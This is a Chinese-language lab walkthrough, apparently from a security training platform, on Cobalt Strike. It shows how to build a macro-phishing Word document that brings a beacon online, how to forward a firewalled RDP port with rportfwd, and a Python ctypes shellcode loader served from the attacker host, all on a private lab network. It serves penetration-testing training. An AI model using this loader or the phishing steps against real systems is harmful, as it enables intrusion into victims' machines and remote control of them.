CobaltStrike之宏钓鱼及shellcode 实验详细

文章目录

  • 预备知识
  • 实验目的
  • 实验地址
  • 实验环境
  • 实验步骤一
    • 启动cs服务器
    • 客户端连入服务器
    • 生成office宏病毒
    • 利用宏病毒上线CS
      • 生成宏文件
      • 利用成功
  • 实验步骤二
  • 实验步骤三

预备知识

CobaltStrike是一款渗透测试神器,常被业界人称为CS神器。CobaltStrike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。  

CobaltStrike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。 

实验目的

通过该实验了解CS的office宏钓鱼,端口转发及shellcode生成。  

实验地址

https://www.hetianlab.com/expc.do?ce=d9293b3a-2e97-4ad9-a907-69a9597b1be0

实验环境

服务器:kali,IP地址:10.1.1.100

靶机:win7 ,IP地址:10.1.1.200

辅助工具:win7上安装office

实验步骤一

启动cs服务器

./teamserver 10.1.1.100 password

CobaltStrike之宏钓鱼及shellcode 实验详细_第1张图片

客户端连入服务器

Java  -XX:+AggressiveHeap  -XX:+UseParallelGC  -jar
cobaltstrike.jar

CobaltStrike之宏钓鱼及shellcode 实验详细_第2张图片

创建监听器

CobaltStrike之宏钓鱼及shellcode 实验详细_第3张图片

生成office宏病毒

attacks->packages->ms office macro
选择刚刚创建好的listener,点击Generate

CobaltStrike之宏钓鱼及shellcode 实验详细_第4张图片

CobaltStrike之宏钓鱼及shellcode 实验详细_第5张图片

  点击copy macro
   这时候宏代码已经被复制了
   我们首先创建一个1.txt,把代码粘贴进去

CobaltStrike之宏钓鱼及shellcode 实验详细_第6张图片

保存并退出
将其拷贝到网站根目录下
cp  1.txt  /var/www/html/1.txt

CobaltStrike之宏钓鱼及shellcode 实验详细_第7张图片

然后启动apache
service  apache2  start

利用宏病毒上线CS

生成宏文件

使用浏览器访问 10.1.1.100/1.txt

CobaltStrike之宏钓鱼及shellcode 实验详细_第8张图片

将这些代码全选复制

然后新建一个office word

视图->宏->查看宏

CobaltStrike之宏钓鱼及shellcode 实验详细_第9张图片

  宏名处随意输入,点击创建

CobaltStrike之宏钓鱼及shellcode 实验详细_第10张图片

Project-microsoftword对象-thisdocument

粘贴之前生成的代码

CobaltStrike之宏钓鱼及shellcode 实验详细_第11张图片

另存为,注意保存类型选择启用宏的文档

CobaltStrike之宏钓鱼及shellcode 实验详细_第12张图片

点击保存后生成了钓鱼文件

利用成功

打开钓鱼文件,即可在攻击机上线beacon

CobaltStrike之宏钓鱼及shellcode 实验详细_第13张图片

excel也是一样的,请自行实验

实验步骤二

如果拿到一台内网机器,想要能够进行远程桌面链接,但是默认远程端口3389被防火墙阻止,可以通过端口转发,CS已经内置了这个功能

输入下列命令:

rportfwd 389 10.1.1.200 3389

即可通过389端口远程桌面了。

实验步骤三

CS可以生成很多类型的shellcode,但是拿到shellcode怎么使用呢?Powershell很简单,在win的powershell环境下就可以使用了,C/c++的也很成熟了,这里就介绍一种常用的语言python,看看python类型的shellcode如何使用。

Attacks->package->paylaod generator

选择监听器demo,选择python,x64视情况勾选,这里我得靶机位x32,所以不用勾选

生成的shellcode为:

CobaltStrike之宏钓鱼及shellcode 实验详细_第14张图片

启动kali上apache服务

然后将python文件移动到网站根目录下
cp payload.py /var/www/html/1.py
访问靶机使用浏览器访问对应地址,即可得到payload

CobaltStrike之宏钓鱼及shellcode 实验详细_第15张图片

新建一个python脚本,填写上面得到的shellcode
import ctypes

shellcode =  ""

rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

CobaltStrike之宏钓鱼及shellcode 实验详细_第16张图片

保存后退出运行
 python C:
 \Users\Administrator\Desktop\1.py

CobaltStrike之宏钓鱼及shellcode 实验详细_第17张图片

此时在kali上就拿到beacon了

CobaltStrike之宏钓鱼及shellcode 实验详细_第18张图片

你可能感兴趣的:(漏洞复现,服务器,windows,linux,CobaltStrike,宏病毒攻击)